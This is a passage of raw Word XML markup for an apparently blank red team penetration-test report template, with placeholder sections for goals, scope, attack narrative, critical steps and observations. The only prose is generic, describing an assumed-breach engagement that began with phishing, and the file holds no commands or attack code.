        </w:rPr>
        <w:t xml:space="preserve"> all accumulated information to identify potential attack vectors. If a weakness can be exploited, operators attempt to obtain additional access into the network or system and to collect sensitive system information to create effects and demonstrate impact to the customer. Vetted tools, methodologies, and operator experience were employed to prevent unintentional disruption, degradation or denial of service to the customer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A0E193" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>The goals included:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA77CE" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="41D2E48A" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="52966B1B" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6F97D701" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SCENARIO AND SCOPE</w:t>
      </w:r>
      <w:hyperlink r:id="rId50" w:anchor="scenario-and-scope" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F20264B" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>SCENARIO</w:t>
      </w:r>
      <w:hyperlink r:id="rId51" w:anchor="scenario" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F69D87E" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">The Red Team engagement was based on the Assumed Breach Model utilizing external command and control. A coordinated phishing attack was used to begin the test and involved the support of a trusted agent. The coordinated phish was followed by a phishing attack against real-world users who did not have any knowledge of the engagement. The approach of the Assumed Breach Model allows the test to begin </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>quickly</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and later use access gained from the phishing attack to validate actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA36465" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>SCOPE</w:t>
      </w:r>
      <w:hyperlink r:id="rId52" w:anchor="scope" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="094F2BAB" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>The scope identified by [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">CLIENT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> is to include the subnet: 111.222.333.444/24. Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4B02B5" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>MICELLANEOUS</w:t>
      </w:r>
      <w:hyperlink r:id="rId53" w:anchor="micellaneous" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01B3AD74" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text Normal text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6511EA7E" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>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lastRenderedPageBreak/>
        <w:t>List Bullet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5DDC2F" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>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List Bullet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD4E3F2" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>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List Bullet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343991E8" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ATTACK NARRATIVE</w:t>
      </w:r>
      <w:hyperlink r:id="rId54" w:anchor="attack-narrative" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F9F46B4" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>The following section outlines the sequence of events and highlights the key points during the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C681D90" w14:textId="708AF688" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2359D068" wp14:editId="7A3579B4">
            <wp:extent cx="5731510" cy="293941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2939415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="014303AB" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>CRITICAL STEP 1</w:t>
      </w:r>
      <w:hyperlink r:id="rId56" w:anchor="critical-step-1" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="02F06F3F" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Crital</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> step details. Include enough details to describe the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>observations</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5CE8793C" w14:textId="4BCE4007" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="479CE2FF" wp14:editId="14D1B30A">
            <wp:extent cx="5731510" cy="3694430"/>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3694430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7FE4B9" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>CRITICAL STEP 2</w:t>
      </w:r>
      <w:hyperlink r:id="rId58" w:anchor="critical-step-2" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E766A59" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Crital</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> step details. Include enough details to describe the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>observations</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6FDA8357" w14:textId="60472053" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68BD39D5" wp14:editId="64E27FA1">
            <wp:extent cx="5731510" cy="369443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3694430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CED847D" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OBSERVATIONS AN RECOMMENDATIONS</w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:anchor="observations-an-recommendations" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F0067D5" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>The following section is intended to discuss specific scenarios that contributed to the compromise. The observations might be individually exploitable, an element of the overall compromise, or serve as a condition that directly impacts the ability to move laterally, escalate privileges, or persist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9C279A" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>OBSERVATION 1</w:t>
      </w:r>
      <w:hyperlink r:id="rId60" w:anchor="observation-1" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2AA814E4" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>details</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
